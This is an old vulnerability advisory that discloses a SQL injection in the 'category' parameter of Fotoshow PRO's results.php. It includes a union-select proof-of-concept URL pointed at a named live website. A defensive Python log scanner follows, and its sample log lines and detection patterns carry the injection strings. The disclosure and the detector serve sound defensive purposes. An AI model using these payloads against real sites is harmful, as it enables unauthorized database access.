Fotoshow PRO SQL Injection

2009-08-18T00:00:00
ID PACKETSTORM:80467
Type packetstorm
Reporter darkmasking
Modified 2009-08-18T00:00:00

Description

                                        
                                            `[»]====================================================================================================================[_][-][X]  
[»] [»]  
[»] Fotoshow PRO™ (category) Remote SQL Injection Vulnerability [»]  
[»] [»]  
[»] ======= ------d-------m------ ==== ==== [»]  
[»] || = | |(o o)| | || || || [»]  
[»] || = ||(~)|| || || [»]  
[»] ======= /|\ || || [»]  
[»]==========================================================================================================================[»]  
[»] Author : darkmasking [»]  
[»] Date : August, 15th 2009 [»]  
[»] Contact : darkmasking[at]gmail[dot]com [»]  
[»] Critical Level : Dangerous (*RED) [»]  
[»]--------------------------------------------------------------------------------------------------------------------------[»]  
[»] Affected software description : [»]  
[»] Software : Fotoshow PRO™ [»]  
[»] Vendor : http://www.fotoshowpro.com/ [»]  
[»] Price : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/ [»]  
[»]==========================================================================================================================[»]  
[»] [»]  
[»] [~] SQLi POC [»]  
[»] [»]  
[»] [+] http://www.target.com/[path]/results.php?category=[SQli] [»]  
[»] [»]  
[»] [»]  
[»]--------------------------------------------------------------------------------------------------------------------------[»]  
[»] [»]  
[»] [~] SQLi POC Demo [»]  
[»] [»]  
[»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null-- [»]  
[»] [»]  
[»]--------------------------------------------------------------------------------------------------------------------------[»]  
[»] [»]  
[»] [~] Greetz [»]  
[»] [»]  
[»] Sorry bro, no friends to greet yet, so this one is just for myself! (HAPPY 17th CELEBRATIONS | Hope it's festive) [»]  
[»] [»]  
[»] [»]  
[»]==========================================================================================================================[»]  
  
`
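For defenders checking web server logs for this issue, the following added example (not part of the original advisory or the vendor's code) flags requests to `results.php` whose `category` value is not a plain integer. The log lines are constructed, and the assumption that legitimate category IDs are non-negative integers is inferred from the numeric value used in the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Aug/2009:10:01:02 +0000] "GET /stock/results.php?category=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Aug/2009:10:02:10 +0000] "GET /stock/results.php?category=-9999%20and%201=0%20union%20select%20null,version(),null,null,null-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Aug/2009:10:02:40 +0000] "GET /stock/results.php?category=7%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Aug/2009:10:03:00 +0000] "GET /stock/index.php?category=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Aug/2009:10:04:00 +0000] "GET /stock/results.php?category=3&category=1+UNION+SELECT+1 HTTP/1.1" 200 700 "-" "Mozilla/5.0"
198.51.100.8 - - [18/Aug/2009:10:05:00 +0000] "GET /stock/results.php?category=abc HTTP/1.1" 200 650 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate category IDs are short non-negative integers.
INTEGER_RE = re.compile(r"[0-9]{1,10}\Z")
SQL_TOKEN_RE = re.compile(r"\b(union|select)\b|--|/\*|'", re.I)

def scan(log_text, script="results.php", param="category"):
    """Return (line_no, client, severity, decoded_value) for suspicious requests."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs URL-decodes and keeps every repeated value of the parameter.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if INTEGER_RE.match(value):
                continue
            severity = "sqli-pattern" if SQL_TOKEN_RE.search(value) else "non-integer"
            findings.append((lineno, client, severity, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is what the application should enforce on `category` before it reaches a query, ideally together with a parameterized statement.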